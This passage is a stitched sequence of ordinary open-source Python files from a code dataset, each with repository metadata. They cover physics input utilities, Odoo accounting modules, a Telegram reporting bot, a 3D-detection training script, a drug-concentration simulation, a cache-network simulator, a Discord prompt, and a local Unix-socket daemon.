line:\n check_dict['end']=i\n\n print(check_dict)\n for i in range(check_dict['start'], check_dict['end']):\n print(i)\n line = lines[i]\n cleaned_line = line[1:].replace('[', '').replace(']', '').replace(',', '').strip()\n output_lines.append(cleaned_line)\n with open(output_filename, 'w') as output_file:\n output_file.write('\\n'.join(output_lines))\n\n\ndef get_infile_meta(mpid, temp, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, 'infile.ssposcar')\n output_filename = join(jdir, 'infile.meta')\n num_atoms = 0\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n lines = [c[:-1] if c.endswith('\\n') else c for c in lines]\n\n for line in lines:\n if line.strip().endswith('coordinates'):\n num_atoms = sum([int(v) for v in lines[lines.index(line) - 1].split()])\n break\n with open(output_filename, 'w') as output_file:\n output_file.write(f\"{num_atoms}\\t# N atoms\\n\")\n output_file.write(f\"0\\t# N timesteps\\n\")\n output_file.write(f\"1.0\\t# timestep in fs\\n\")\n output_file.write(f\"{temp}\\t# temperature in K\\n\")\n\n\ndef get_infile_stat(mpid, jobdir):\n jdir = join(jobdir,str(mpid))\n output_filename = join(jdir, 'infile.stat')\n with open(output_filename, 'w') as output_file:\n output_file.write(\"0 1 1 1 1 1 1 1 1 1 1 1 1\\n\")\n","repo_name":"RyotaroOKabe/ab_anharmonic","sub_path":"utils/tdep.py","file_name":"tdep.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36518183042","text":"from odoo import api, models\n\n\nclass MailComposeMessage(models.TransientModel):\n _inherit = 'mail.compose.message'\n\n \n def send_mail(self, auto_commit=False):\n if self._context.get('default_model') == 'account.tax.withholding' and self._context.get(\n 'default_res_id') and self._context.get('mark_so_as_sent'):\n withhold = self.env['account.tax.withholding'].browse([self._context['default_res_id']])\n if withhold.state == 'send':\n withhold.state = 'sent'\n self = self.with_context(mail_post_autofollow=True)\n return super(MailComposeMessage, self).send_mail(auto_commit=auto_commit)\n","repo_name":"DosSantosAlberto/V16","sub_path":"l10n_ao/wizards/mail_compose_message.py","file_name":"mail_compose_message.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23266882510","text":"from .dispetcher import dp\nfrom pandas import DataFrame\nfrom aiogram import types\nfrom datetime import datetime\nimport os\nfrom aiogram_calendar import simple_cal_callback, SimpleCalendar\n\n\nfrom func import delete_message, return_month, \\\n write_styling_excel, month_name, create_xml\nfrom clas import User, ToxicCase, Organization, Log\n\n\n@dp.message_handler(commands=['file_get_toxic_cases'])\nasync def file_get_toxic_cases(message: types.Message):\n await delete_message(message)\n\n try:\n await User.get(message['from']['id'])\n except ValueError:\n await Log.add(message['from']['id'], 2)\n return await message.answer(\n \"вы неизвестный пользователь!\",\n parse_mode='html'\n )\n await message.answer(\n text=\"Выбор даты:\",\n reply_markup=await SimpleCalendar().start_calendar(\n datetime.now().year,\n datetime.now().month\n )\n )\n\n\n@dp.callback_query_handler(simple_cal_callback.filter())\nasync def process_simple_calendar(\n callback_query: types.CallbackQuery,\n callback_data: dict):\n \"\"\"Создание задания после выбора даты из 
календаря\"\"\"\n\n selected, date = await SimpleCalendar().process_selection(\n callback_query,\n callback_data)\n\n if selected:\n await delete_message(callback_query.message)\n\n USER = await User.get(callback_query['from']['id'])\n if USER.role in ['admin', 'rpn']:\n MO = await Organization.get_org_id_list()\n else:\n MO = [USER.org]\n START, END = return_month(date)\n\n JSON = await ToxicCase.file_cases_mo(START, END, MO)\n\n df = DataFrame(data=JSON)\n df = df.fillna('')\n if len(df) == 0:\n mess = f'Нет случаев за месяц {month_name(date.month)}' \\\n + f' {date.year} года'\n return await callback_query.message.answer(mess)\n FILENAME = f'/tmp/Случаи_за_{month_name(date.month)}_{date.year}.xlsx'\n SHETNAME = 'def'\n if USER.role in ['rpn']:\n df = df.loc[(df['Статус СМО'] == 'актуальный') & (df['Этап установления диагноза'] == 'Заключительный')]\n del df['Этап установления диагноза']\n del df['Статус СМО']\n\n write_styling_excel(FILENAME, df, SHETNAME)\n await callback_query.message.answer_document(open(FILENAME, 'rb'))\n os.remove(FILENAME)\n await Log.add(USER.u_id, 21)\n\n # Создаем файлик XML\n if USER.role in ['admin', 'rpn']:\n # за месяц\n JSON = await ToxicCase.file_cases_xml(START, END)\n NAME = f'Случаи_за_{month_name(date.month)}_{date.year}'\n FILE = create_xml(JSON, NAME)\n await callback_query.message.answer_document(open(FILE, 'rb'))\n\n # за день\n JSON = await ToxicCase.file_cases_xml(date, date)\n NAME = f'Случаи_за_{date.strftime(\"%d_%m_%Y\")}'\n FILE = create_xml(JSON, NAME)\n await callback_query.message.answer_document(open(FILE, 'rb'))\n","repo_name":"oleg-medovikov/bot-regiza","sub_path":"disp/file_cases_mo.py","file_name":"file_cases_mo.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27173120282","text":"from __future__ import division\nimport argparse\nimport sys\nsys.path.append('/home/billyhe/SA-SSD')\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmdet.datasets import build_dataloader\nfrom tools.env import get_root_logger, init_dist, set_random_seed\nfrom tools.train_utils import train_model\nimport pathlib\nfrom mmcv import Config\nfrom mmdet.datasets import get_dataset\nfrom mmdet.models import build_detector\nfrom tools.train_utils.optimization import build_optimizer, build_scheduler\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('config', help='train config file path')\n parser.add_argument('--work_dir', help='the dir to save logs and models')\n parser.add_argument(\n '--validate',\n action='store_true',\n help='whether to evaluate the checkpoint during training')\n parser.add_argument(\n '--gpus',\n type=int,\n default=1,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n parser.add_argument('--seed', type=int, default=0, help='random seed')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='job launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--max_ckpt_save_num', type=int, default=10)\n\n args = parser.parse_args()\n\n return args\n\n\n\ndef main():\n\n args = parse_args()\n\n cfg = Config.fromfile(args.config)\n\n if args.work_dir is not None:\n cfg.work_dir = args.work_dir\n\n pathlib.Path(cfg.work_dir).mkdir(parents=True, exist_ok=True)\n\n cfg.gpus = args.gpus\n\n # init distributed env first, since logger 
depends on the dist info.\n if args.launcher == 'none':\n distributed = False\n else:\n distributed = True\n init_dist(args.launcher, **cfg.dist_params)\n\n # init logger before other steps\n logger = get_root_logger(cfg.work_dir)\n\n logger.info('Distributed training: {}'.format(distributed))\n\n # set random seeds\n if args.seed is not None:\n logger.info('Set random seed to {}'.format(args.seed))\n set_random_seed(args.seed)\n\n model = build_detector(\n cfg.model, train_cfg=cfg.train_cfg, test_cfg=cfg.test_cfg)\n\n if distributed:\n model = MMDistributedDataParallel(model.cuda())\n else:\n model = MMDataParallel(model, device_ids=range(cfg.gpus)).cuda()\n\n train_dataset = get_dataset(cfg.data.train)\n\n optimizer = build_optimizer(model, cfg.optimizer)\n\n train_loader = build_dataloader(\n train_dataset,\n cfg.data.imgs_per_gpu,\n cfg.data.workers_per_gpu,\n dist=distributed)\n\n start_epoch = it = 0\n last_epoch = -1\n\n lr_scheduler, lr_warmup_scheduler = build_scheduler(\n optimizer, total_iters_each_epoch=len(train_loader), total_epochs=cfg.total_epochs,\n last_epoch=last_epoch, optim_cfg=cfg.optimizer, lr_cfg=cfg.lr_config\n )\n # -----------------------start training---------------------------\n logger.info('**********************Start training**********************')\n\n train_model(\n model,\n optimizer,\n train_loader,\n lr_scheduler=lr_scheduler,\n optim_cfg=cfg.optimizer,\n start_epoch=start_epoch,\n total_epochs=cfg.total_epochs,\n start_iter=it,\n rank=args.local_rank,\n logger = logger,\n ckpt_save_dir=cfg.work_dir,\n lr_warmup_scheduler=lr_warmup_scheduler,\n ckpt_save_interval=cfg.checkpoint_config.interval,\n max_ckpt_save_num=args.max_ckpt_save_num,\n log_interval = cfg.log_config.interval\n )\n\n logger.info('**********************End training**********************')\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skyhehe123/SA-SSD","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":486,"dataset":"github-code","pt":"76"} +{"seq_id":"38247750893","text":"\n# Drugs version 1: exponential decay\n# Stephen Davies -- CPSC 420\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nsimulation_hrs = 24 # hours\ndelta_t = 5/60 # hours\ntime_values = np.arange(0, simulation_hrs, delta_t) # hours\ndosage_freq = 2 # hours\ndosage = 2 * 325 * 1000 # ug\n\nhalf_life = 3.2 # hours\nplasma_volume = 3000 # ml\nelimination_constant = math.log(2)/half_life # 1/hour\n\n# Create an (empty) array for the stock.\nD = np.zeros(len(time_values)) # ug\n\n# Initial conditions: pop two aspirin at the start of the simulation.\nD[0] = dosage # ug\n\n\nfor i in range(1, len(time_values)):\n\n # Compute the values for the flows.\n elimination_rate = elimination_constant * D[i-1] # ug/hr\n\n # Add up all the values for the \"primes.\"\n D_prime = -elimination_rate \n\n # Calculate the next value of the stocks, based on the primes.\n D[i] = D[i-1] + D_prime * delta_t\n\n # If it's time to pop another pill, do so, by just adding to the stock.\n if i in np.arange(0,len(time_values),int(dosage_freq/delta_t)):\n D[i] += dosage\n \n\n# Compute the value for the derived stock.\nplasma_concentration = D / plasma_volume\n\n# MEC: Minimum Effective Concentration (has to be this high to do any good)\nmec = 150 # ug/ml\n\n# MTC: Maximum Therapeutic Concentration (don't exceed!)\nmtc = 350 # ug/ml\n\nplt.plot(time_values, plasma_concentration)\nplt.axhline(mec, 
color=\"blue\")\nplt.axhline(mtc, color=\"red\")\nplt.ylim(0,max(plasma_concentration.max(), 400))\n\nplt.show()\n","repo_name":"divilian/cpsc420","sub_path":"drugs1.py","file_name":"drugs1.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27364368588","text":"\"\"\"This module implements the simulation engine.\n\nThe simulation engine, given the parameters according to which a single\nexperiments needs to be run, instantiates all the required classes and executes\nthe experiment by iterating through the event provided by an event generator\nand providing them to a strategy instance.\n\"\"\"\nfrom icarus.execution import NetworkModel, NetworkView, NetworkController, CollectorProxy\nfrom icarus.registry import DATA_COLLECTOR, STRATEGY\n\nimport networkx as nx\nimport fnss\n\n\n__all__ = ['exec_experiment',\n\t\t 'exec_offline_experiment',\n\t\t ]\n\ndef symmetrify_paths(shortest_paths):\n\t\"\"\"Make paths symmetric\n\n\tGiven a dictionary of all-pair shortest paths, it edits shortest paths to\n\tensure that all path are symmetric, e.g., path(u,v) = path(v,u)\n\n\tParameters\n\t----------\n\tshortest_paths : dict of dict\n\t\tAll pairs shortest paths\n\n\tReturns\n\t-------\n\tshortest_paths : dict of dict\n\t\tAll pairs shortest paths, with all paths symmetric\n\n\tNotes\n\t-----\n\tThis function modifies the shortest paths dictionary provided\n\t\"\"\"\n\tfor u in shortest_paths:\n\t\tfor v in shortest_paths[u]:\n\t\t\tshortest_paths[u][v] = list(reversed(shortest_paths[v][u]))\n\treturn shortest_paths\n\ndef exec_experiment(topology, workload, netconf, strategy, cache_policy, collectors):\n\t\"\"\"Execute the simulation of a specific scenario.\n\n\tParameters\n\t----------\n\ttopology : Topology\n\t\tThe FNSS Topology object modelling the network topology on which\n\t\texperiments are run.\n\tworkload : iterable\n\t\tAn iterable object whose elements are (time, event) tuples, where time\n\t\tis a float type indicating the timestamp of the event to be executed\n\t\tand event is a dictionary storing all the attributes of the event to\n\t\texecute\n\tnetconf : dict\n\t\tDictionary of attributes to inizialize the network model\n\tstrategy : tree\n\t\tStrategy definition. It is tree describing the name of the strategy\n\t\tto use and a list of initialization attributes\n\tcache_policy : tree\n\t\tCache policy definition. It is tree describing the name of the cache\n\t\tpolicy to use and a list of initialization attributes\n\tcollectors: dict\n\t\tThe collectors to be used. 
It is a dictionary in which keys are the\n\t\tnames of collectors to use and values are dictionaries of attributes\n\t\tfor the collector they refer to.\n\n\tReturns\n\t-------\n\tresults : Tree\n\t\tA tree with the aggregated simulation results from all collectors\n\t\"\"\"\n\tmodel = NetworkModel(topology, cache_policy, **netconf)\n\tview = NetworkView(model)\n\tcontroller = NetworkController(model)\n\n\tcollectors_inst = [DATA_COLLECTOR[name](view, **params)\n\t\t\t\t\t for name, params in collectors.items()]\n\tcollector = CollectorProxy(view, collectors_inst)\n\tcontroller.attach_collector(collector)\n\n\tstrategy_name = strategy['name']\n\tstrategy_args = {k: v for k, v in strategy.items() if k != 'name'}\n\tstrategy_inst = STRATEGY[strategy_name](view, controller, **strategy_args)\n\n\tfor time, event in workload:\n\t\tstrategy_inst.process_event(time, **event)\n\treturn collector.results()\n\ndef exec_offline_experiment(topology, workload, netconf, strategy, ):\n\t# Filter inputs\n\tif not isinstance(topology, fnss.Topology):\n\t\traise ValueError('The topology argument must be an instance of '\n\t\t\t\t\t\t 'fnss.Topology or any of its subclasses.')\n\n\t# Shortest paths of the network\n\tshortest_path = symmetrify_paths(nx.all_pairs_dijkstra_path(topology))\n\tcontent_source = {}\n\t# Dictionary mapping the reverse, i.e. nodes to set of contents stored\n\tsource_node = {}\n\n\t# Dictionary of link weights\n\tlink_weight = nx.get_edge_attributes(topology, 'util')\n\tif not topology.is_directed():\n\t\tfor (u, v), lw in list(link_weight.items()):\n\t\t\tlink_weight[(v, u)] = lw\n\n\tcache_size = {}\n\tfor node in topology.nodes_iter():\n\t\tstack_name, stack_props = fnss.get_stack(topology, node)\n\t\tif stack_name == 'router':\n\t\t\tif 'cache_size' in stack_props:\n\t\t\t\tcache_size[node] = stack_props['cache_size']\n\t\telif stack_name == 'source':\n\t\t\tcontents = stack_props['contents']\n\t\t\tsource_node[node] = contents\n\t\t\tfor content in contents:\n\t\t\t\tcontent_source[content] = node\n\tif any(c < 1 for c in cache_size.values()):\n\t\tfor node in cache_size:\n\t\t\tif cache_size[node] < 1:\n\t\t\t\tcache_size[node] = 1\n\n\tpopularity = workload.get_popularity_all()\n\n\tstrategy_name = strategy['name']\n\tstrategy_inst = STRATEGY[strategy_name](shortest_path, link_weight, cache_size, workload.contents, content_source, popularity)\n\treturn strategy_inst.results()","repo_name":"milliele/WeightedCache","sub_path":"icarus/execution/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37305976444","text":"from .choice import Input\n\n__all__ = (\"YesNo\", \"yesno\")\n\nclass YesNo(Input):\n r\"\"\"\n A :class:`~senko.utils.io.Input` for boolean values.\n\n Prompts the user to choose yes or no, and returns the\n appropriate boolean value.\n\n Parameters\n ----------\n ctx: Union[senko.CommandContext, senko.PartialContext]\n The context under which to run the prompt.\n timeout: Optional[float]\n Delay in seconds after which the prompt should time out. Defaults to 60.\n raise_timeout: Optional[bool]\n Whether to raise when timing out. 
Defaults to ``False``.\n delete_after: Optional[bool]\n Whether to delete the prompt and user input upon completing.\n Defaults to ``False``.\n \\*\\*kwargs\n Keyword arguments to pass into :func:`senko.utils.io.build_embed` to\n build the input prompt embed from.\n \"\"\"\n\n def __init__(\n self,\n ctx,\n timeout=60,\n raise_timeout=False,\n delete_after=False,\n **kwargs,\n ):\n # Initialize superclass\n super().__init__(\n ctx,\n converter=bool,\n ignore_errors=True,\n timeout=timeout,\n raise_timeout=raise_timeout,\n raise_errors=False,\n delete_after=delete_after,\n **kwargs,\n )\n\n async def _send_message(self):\n # Generate field for yes and no options.\n _ = self.ctx.locale\n\n # NOTE: Name of the \"Options\" field in yes/no prompts.\n field_name = _(\"Options\")\n\n # NOTE: Text for the \"yes\" option in a yes/no prompt.\n yes_text = _(\"{e:check} Respond with **yes** to confirm.\")\n\n # NOTE: Text for the \"no\" option in a yes/no prompt.\n no_text = _(\"{e:cross} Respond with **no** to cancel.\")\n\n field_value = self.bot.emotes.format(f\"{yes_text}\\n{no_text}\")\n\n kwargs = self.kwargs.copy()\n fields = self.kwargs.get(\"fields\", []).copy()\n fields.append(dict(name=field_name, value=field_value, inline=False))\n kwargs[\"fields\"] = fields\n\n return await self.ctx.embed(**kwargs)\n\nasync def yesno(ctx, **kwargs):\n r\"\"\"\n Create and run a :class:`~senko.utils.io.YesNo` and return its result.\n\n Parameters\n ----------\n ctx: Union[senko.CommandContext, senko.PartialContext]\n The context under which to run the prompt.\n \\*args\n Positional arguments to pass into :class:`~senko.utils.io.YesNo`.\n \\*\\*kwargs\n Keyword arguments to pass into :class:`~senko.utils.io.YesNo`.\n\n Raises\n ------\n InputTimeoutError\n Exception raised when the prompt times out.\n \n Returns\n -------\n Optional[bool]\n Either a boolean value denoting the user's choice, \n or ``None`` if the prompt timed out.\n \"\"\"\n prompt = YesNo(ctx, **kwargs)\n return await prompt.run()\n","repo_name":"rawsumi/senko-disc-bot","sub_path":"utils/io/yesno.py","file_name":"yesno.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36944747105","text":"#!/usr/bin/python3\n\nimport os\nimport configparser\nimport re\nimport time\nimport signal\nimport socket\nimport struct\nimport sys\nimport errno\n\nEND = 'DAEMON COPY'\n\nSOCKFILE = '/tmp/taskmaster.sock'\n\nLOGFILE = 'tmp/taskmaster.log'\n\n\nclass ServerSocket():\n def __init__(self):\n self.sock_address = SOCKFILE\n try:\n os.remove(self.sock_address)\n except OSError:\n pass\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.connection = None\n self.address = None\n self.socket.bind(self.sock_address)\n self.socket.listen(1)\n self.accept()\n def accept(self):\n try:\n self.connection, self.address = self.socket.accept()\n except socket.error as err:\n if err.errno == errno.EINTR:\n self.accept()\n def send(self, msg):\n try:\n length = struct.pack('!I', len(msg))\n self.connection.sendall(length)\n self.connection.sendall(msg.encode())\n except socket.error as err:\n if err.errno == errno.EBADF:\n self.accept()\n if err.errno == errno.EINTR:\n self.send(msg)\n def recv(self):\n try:\n n = self.connection.recv(4)\n if not n: return None\n length, = struct.unpack('!I', n)\n message = self.connection.recv(length)\n return message.decode()\n except socket.error as err:\n if err.errno == errno.EBADF:\n self.accept()\n if 
err.errno == errno.EINTR:\n pass\n def close_connection(self):\n if self.connection:\n self.connection.close()\n def close_socket(self):\n if self.socket:\n self.socket.close()\n\nclass ClientSocket():\n def __init__(self):\n self.sock_address = SOCKFILE\n self.connect()\n def connect(self):\n try:\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.socket.connect(self.sock_address)\n except socket.error as err:\n if err.errno == errno.ECONNREFUSED:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def send(self, msg):\n try:\n length = struct.pack('!I', len(msg))\n self.socket.sendall(length)\n self.socket.sendall(msg.encode())\n except (OSError, socket.error) as err:\n if err.errno == errno.EPIPE or err.errno == errno.ENOTCONN:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def recv(self):\n try:\n n = self.socket.recv(4)\n if not n: return None\n length, = struct.unpack('!I', n)\n message = self.socket.recv(length)\n return message.decode()\n except (OSError, socket.error) as err:\n if err.errno == errno.EPIPE or err.errno == errno.ENOTCONN:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def close(self):\n self.socket.close()\n","repo_name":"MohsineF/master","sub_path":"tasksocket.py","file_name":"tasksocket.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"32141012422","text":"import logging\n\nfrom odoo import api, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _name = \"account.move\"\n _inherit = [\"account.move\", \"l10n.ro.mixin\"]\n\n def button_create_landed_costs(self):\n \"\"\"Update account of the landed cost ine with the one from invoice line.\"\"\"\n\n res = super().button_create_landed_costs()\n landed_cost = self.env[\"stock.landed.cost\"].browse(res.get(\"res_id\"))\n if self.is_l10n_ro_record and landed_cost:\n picking_invoice_ids = (\n self.line_ids.mapped(\"purchase_line_id\")\n .mapped(\"order_id\")\n .mapped(\"picking_ids\")\n )\n picking_landed_cost_ids = (\n self.env[\"stock.landed.cost\"]\n .search([(\"state\", \"=\", \"done\")])\n .mapped(\"picking_ids\")\n )\n landed_cost.picking_ids = picking_invoice_ids.filtered(\n lambda l: l not in picking_landed_cost_ids and l.state == \"done\"\n )\n for line in landed_cost.cost_lines:\n invoice_line = self.line_ids.filtered(\n lambda l: l.product_id == line.product_id\n )\n if invoice_line:\n line.account_id = invoice_line[0].account_id\n return res\n\n def _stock_account_prepare_anglo_saxon_out_lines_vals(self):\n # nu se mai face descarcarea de gestiune la facturare\n invoices = self\n for move in self:\n if move.is_l10n_ro_record:\n invoices -= move\n return super(\n AccountMove, invoices\n )._stock_account_prepare_anglo_saxon_out_lines_vals()\n\n def action_post(self):\n res = super(AccountMove, self).action_post()\n for move in self.filtered(\"is_l10n_ro_record\"):\n for line in move.line_ids:\n _logger.debug(\n \"%s\\t\\t%s\\t\\t%s\"\n % (line.debit, line.credit, line.account_id.display_name)\n )\n invoice_lines = move.invoice_line_ids.filtered(lambda l: not l.display_type)\n for line in invoice_lines:\n valuation_stock_moves = line._l10n_ro_get_valuation_stock_moves()\n if valuation_stock_moves:\n svls = valuation_stock_moves.sudo().mapped(\n \"stock_valuation_layer_ids\"\n )\n svls = svls.filtered(lambda l: not l.l10n_ro_invoice_line_id)\n svls.write(\n {\n \"l10n_ro_invoice_line_id\": line.id,\n \"l10n_ro_invoice_id\": 
line.move_id.id,\n }\n )\n\n return res\n\n\nclass AccountMoveLine(models.Model):\n _name = \"account.move.line\"\n _inherit = [\"account.move.line\", \"l10n.ro.mixin\"]\n\n @api.onchange(\"is_landed_costs_line\")\n def _onchange_is_landed_costs_line(self):\n res = super()._onchange_is_landed_costs_line()\n if (\n self.move_id.is_l10n_ro_record\n and self.product_type == \"service\"\n and self.is_landed_costs_line\n ):\n accounts = self.product_id.product_tmpl_id._get_product_accounts()\n if self.move_id.move_type not in (\"out_invoice\", \"out_refund\"):\n self.account_id = accounts[\"expense\"]\n else:\n self.account_id = accounts[\"income\"]\n return res\n\n def _l10n_ro_get_valuation_stock_moves(self):\n valuation_stock_moves = self.env[\"stock.move\"]\n if self.purchase_line_id or self.sale_line_ids:\n domain = [\n (\"state\", \"=\", \"done\"),\n (\"product_qty\", \"!=\", 0.0),\n ]\n if self.purchase_line_id:\n domain += [(\"purchase_line_id\", \"=\", self.purchase_line_id.id)]\n if self.sale_line_ids:\n domain += [(\"sale_line_id\", \"in\", self.sale_line_ids.ids)]\n\n valuation_stock_moves = self.env[\"stock.move\"].search(domain)\n\n return valuation_stock_moves\n\n def _get_computed_account(self):\n res = super(AccountMoveLine, self)._get_computed_account()\n # Take accounts from stock location in case the category allow changinc\n # accounts and the picking is not notice\n if (\n self.product_id.categ_id.l10n_ro_stock_account_change\n and self.product_id.type == \"product\"\n and self.move_id.is_l10n_ro_record\n ):\n fiscal_position = self.move_id.fiscal_position_id\n if self.move_id.is_purchase_document():\n stock_moves = self._get_account_change_stock_moves_purchase()\n for stock_move in stock_moves:\n if (\n stock_move.location_dest_id.l10n_ro_property_stock_valuation_account_id\n ):\n location = stock_move.location_dest_id\n res = location.l10n_ro_property_stock_valuation_account_id\n if self.move_id.is_sale_document():\n stock_moves = self._get_account_change_stock_moves_sale()\n for stock_move in stock_moves:\n if (\n stock_move.location_id.l10n_ro_property_account_income_location_id\n ):\n location = stock_move.location_id\n res = location.l10n_ro_property_account_income_location_id\n if fiscal_position:\n res = fiscal_position.map_account(res)\n return res\n\n def _get_account_change_stock_moves_purchase(self):\n stock_moves = self.purchase_line_id.move_ids\n return stock_moves.filtered(lambda m: m.state == \"done\")\n\n def _get_account_change_stock_moves_sale(self):\n sales = self.sale_line_ids.filtered(lambda s: s.move_ids)\n return sales.move_ids\n","repo_name":"OCA/l10n-romania","sub_path":"l10n_ro_stock_account/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"31198581615","text":"# Draw 5 squares, 20 units per side. 
Use a functon\n\nimport turtle\n\n\ndef drawsquare(t, sz):\n \"\"\"Make turtle t draw a square of with side sz.\"\"\"\n for i in range(4):\n t.forward(sz)\n t.left(90)\n\n\nwn = turtle.Screen()\nwn.bgcolor(\"lightgreen\")\n\nalex = turtle.Turtle()\nalex.color(\"hotpink\")\nalex.pensize(3)\n\nsize = 20\nfor i in range(5):\n drawsquare(alex, size)\n alex.penup()\n alex.forward(-10)\n alex.right(90)\n alex.forward(10)\n alex.left(90)\n alex.pendown()\n size = size + 20\n\nwn.exitonclick()\n","repo_name":"BradyHodge/python_projects","sub_path":"tri1/exercise_6a.py","file_name":"exercise_6a.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13115567777","text":"import argparse\nimport sys\n# help flag provides flag help\n\n\ndef parse_arguments(arg_list=None):\n if arg_list is None:\n arg_list = sys.argv[1:]\n parser = argparse.ArgumentParser(description=\"Run a task of cronjob\")\n parser.add_argument(\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"Run the task with little dataset and log_level=debug\",\n )\n\n # Accept extra args to override yaml\n run_opts = parser.parse_args(arg_list)\n\n # Ignore items that are \"None\", they were not passed\n run_opts = {k: v for k, v in vars(run_opts).items() if v is not None}\n\n # param_file = run_opts[\"param_file\"]\n # del run_opts[\"param_file\"]\n return run_opts","repo_name":"LIZHICHAOUNICORN/CodeTools","sub_path":"code_tools/utils/args_parse.py","file_name":"args_parse.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35307578134","text":"# from ollin.Administrator.AdmOllin import Ollin # Loading Data Base data.db \\ ..........\n# from ollin.Example.UOS import Stream, Valve, Heater, Flash\n# PR = Ollin.AddModel(\"PR\", \"PR\", 'ANTOINE') # Create a thermodynamic models and naming\n# print(PR.__dict__)\n# Ollin.Add([\"METHANE\",\"ETHANE\",\"PROPANE\",\"ISOBUTANE\",\"N-BUTANE\",\"N-PENTANE\",\"N-HEXANE\",\"N-HEPTANE\",\"N-OCTANE\",\"N-NONANE\",\"N-DECANE\",\"N-UNDECENE\"],\"PR\")\n# # Add the compounds of the mixture\n# #Ollin.Add([\"ETHANE\" \"PROPANE\", \"N-BUTANE\", \"N-PENTANE\", \"N-HEXANE\"], \"PR\")\n# Ollin.LoadConst()\n# print(PR.__dict__)\n#\n# print(\"############## Calling of AddCase() of Ollin\")\n# thermo_obj_PR = Ollin.AddCase('PR')\n# print(\"############## Calling SetX() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.SetX([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\n#\n# #thermo_obj_PR.SetX([0.05,0.15,0.25,0.20,0.35])\n#\n# print(\"############## Calling T() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.T(322)\n#\n# print(\"############## Calling FracVap() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.FracVap(0.6)\n#\n# print(\"############## Calling P() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.P(1861)\n#\n# print(\"------------- ThermoObj for PR -----------\", )\n# print(thermo_obj_PR.__dict__)\n#\n# print(\"#################### Calling Ollin().Solve()\")\n# Ollin.Solve()\n# print(\"#################### Calling Ollin().Resumen()\")\n# Ollin.Resumen()\n\n\n# print(\"############# calling of Stream() from myTestExp.py ####################\")\n# S1 = Stream(PR)\n# print(\"Stream() obj dict: \")\n# print(S1.__dict__)\n# print(\"ThermoCase Model attribute from Stream() obj: \")\n# print(S1.Model.__dict__)\n# print(\"Thermodynamic Case 
attribute from Stream() obj: \")\n# print(S1.Case.__dict__)\n# print(\"Set Thermodynamic x property: \")\n# S1.X([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\n# # Set MassFraction for Stream() obj and mole fraction of the Thermodynamic obj as ThemoObj()\n# print(\"MassFraction for Stream() obj and mole fraction of the Thermodynamic Case obj as ThemoObj() are created\")\n# print(\"Mass Fraction: \", S1.MassFraction)\n# print(\"Mole Fraction: \", S1.Case.Prop[\"x\"])\n# print(\"Set Temperature of Thermodynamic Case obj as ThemoObj()\")\n# S1.T(322)\n# print(\"Temperature: \", S1.Case.Prop[\"T\"])\n# print(\"Set Pressure of Thermodynamic Case obj as ThemoObj()\")\n# S1.P(1861)\n# print(\"Pressure: \", S1.Case.Prop[\"P\"])\n# print(\"Set MoleFlow of Stream() obj\")\n# S1.Mol(455)\n# print(\"MoleFlow: \", S1.MoleFlow)\n\n# V1 = Valve(PR)\n# V1.DP = 50\n#\n# H1 = Heater(PR)\n# H1.DP = 1\n# H1.DT = 1\n#\n#\n# print(\"############## Calling of AddCase() of Ollin\")\n# Ollin.AddCase('PR')\n# print(\"#####################################################\")\n# Ollin.Solve()\n# Ollin.Resumen()\n#########################################################################################################\nfrom ollin.Administrator.AdmOllin import Ollin\nPR = Ollin.AddModel(\"PR\", 